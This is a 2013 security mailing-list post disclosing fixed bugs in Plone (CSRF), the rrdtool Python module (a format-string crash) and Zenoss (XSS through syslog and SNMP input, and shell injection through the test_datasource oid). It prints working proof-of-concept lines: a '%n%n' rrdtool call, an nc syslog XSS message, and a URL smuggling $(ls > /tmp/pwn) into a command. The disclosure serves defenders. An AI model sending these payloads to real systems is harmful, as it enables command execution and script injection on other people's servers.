|
Message-ID: <CAN00zFDemB78NwGXC1qTU9hCpW9Cv4MVtM7dCJ5KfCoxA3eMfA@mail.gmail.com> Date: Thu, 18 Apr 2013 14:05:42 +0200 From: Thomas Pollet <thomas.pollet@...il.com> To: oss-security@...ts.openwall.com Subject: plone, rrdtool, zenoss bugs Hi, I reported a csrf bug in plone pluggable authentication service, fixed in 4.2.5 http://plone.org/products/plone/releases/4.2.5 " CSRF protection for the ZODBUserManager, ZODBGroupManager, ZODBRoleManger, and DynamicGroupsPlugin plugins." Also, the rrdtool python module crashes on format string exploit $ python -c "import rrdtool rrdtool.graph('/tmp/out.png','-f','%n%n')" Segmentation fault this module is used by zenoss to create graphs (zenoss users are able to pass arguments to rrdtool). On zenoss, I reported some bugs to them (and to this list) which have been fixed in the latest release (4.2.3). for example, zenoss displayed syslog and snmp input without filtering html characters which results in xss. example syslog exploit : echo '<130>' Aug 29 07:17:34 test '<xss>' | nc -u zenoss 514 another bug was that the test_datasource feature doesn't escape the snmp oid which is passed by zenoss to the shell as an argument for the snmpwalk command example: https:// [ZENOSS_HOST]/zport/dmd/Devices/rrdTemplates/Device/datasources/sysUpTime/test_datasource?data={%22newId%22:%22DetectedVirus%22,%22oid%22:%22$%28ls%20%3E%20/tmp/pwn%29%22,%22enabled%22:%22on%22,%22testDevice%22:%22127.0.0.1%22,%22uid%22:%22%22} http://jira.zenoss.com/jira/browse/ZEN-3183 Cheers, T
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.